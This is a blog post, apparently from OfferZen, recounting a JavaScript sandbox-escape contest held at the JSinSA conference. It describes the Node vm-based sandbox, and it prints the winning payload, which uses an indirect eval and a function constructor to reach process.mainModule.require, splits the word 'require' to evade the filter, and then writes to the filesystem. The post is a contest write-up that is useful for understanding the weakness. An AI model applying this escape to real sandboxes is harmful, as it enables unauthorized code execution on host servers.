The OfferZen team attended this year’s JSinSA conference. We thought it would be fun to organise a short hacking challenge for hardcore JavaScript coders. We ended up having a lot of fun in the process, and wanted to share what happened.
A simple challenge
We knew we wanted something that’s super low overhead for the contestants. So our principles were:
- Easy enough to get started in <15 seconds
- No tools or downloads
- No code checkout or commits needed
Based on these goals we decided to go for an in-browser hacking challenge. We wanted something that a skilled coder could solve in less than 10 lines of JS, but could still provide a decent challenge and room for creativity.
We decided to make the prize an Amazon Echo. We love using Amazon’s Echo and as a bonus it’s a really cool platform to develop on.
Under the hood
The actual challenge was to “root” a JavaScript sandbox environment. You had a web editor where you could write JavaScript code and run it on our server. The sandbox was highly restrictive and prevented you from doing things like requiring external libraries or writing to files. The winner would be the first person to break out of the sandbox and get their code to do something restricted.
You can try out the sandbox here: http://hackme.meteorapp.com
Behind the scenes the sandbox executes the user’s code in a restricted NodeJS environment:
- A Node.js subprocess is created
"use strict”;is used- finally the code is executed using
vm.runInNewContext()
We did a few things to make it extra hard, like stripping out the string “require”. This meant that even if you managed to execute unauthorized code, it wasn’t trivial to “root” us.
Going blind
The team member setting up the sandbox left in one vulnerability known to him, but didn’t tell the rest of the team what it was, just to make things more fun. ;)
Running the challenge
We went live on the Friday evening, the day before the conference. 85 people attempted the challenge (about ⅓ of the attendees!) and made more than 2600 code submissions.
By 12:00 on Saturday we got an interesting code submission from
Patrick Kettner.
Patrick is on Microsoft’s Edge browser team, is a core dev on Modernizr and has serious credibility in the JavaScript community. We immediately realised it could be a winner, and after a few minutes of checking, we confirmed it was the first submission to fully break the sandbox.
Patrick used a really elegant hack that used the known vulnerability and bypassed the “require” stripping to be the first to break out of the Sandbox fully:
function main(callback) {
var a = ((0, eval)('this')).application;
var w = (a).whenConnected;
var req = ((w).constructor)('return process.mainModule.req'+'uire')();
var fs = req('fs');
fs.writeFileSync('/tmp/pwned', '@patrickkettner says hi!!')
custom.log(fs.readFileSync('/tmp/pwned').toString())
callback(true);
}
Patrick was kind enough to explain the hack to everyone. It was pretty advanced stuff, and definitely impressed the audience.
Brett, one of the OfferZen founders, gave him his well-deserved Echo at the conference:
Lessons learnt
- People are very keen on this kind of challenge - we received a lot of positive feedback from developers.
- Having a hard problem is cool - many people (us included) found it really challenging, but still fun. A few people explicitly said “don’t make it easier”, when I asked them about the difficulty.
- Make your challenge mobile friendly - we expected everyone at the conference to have laptops and didn’t spend time on making the web IDE mobile friendly. However less than half the audience ended up having laptops.
Interested in learning a bit about syslog? check out this article
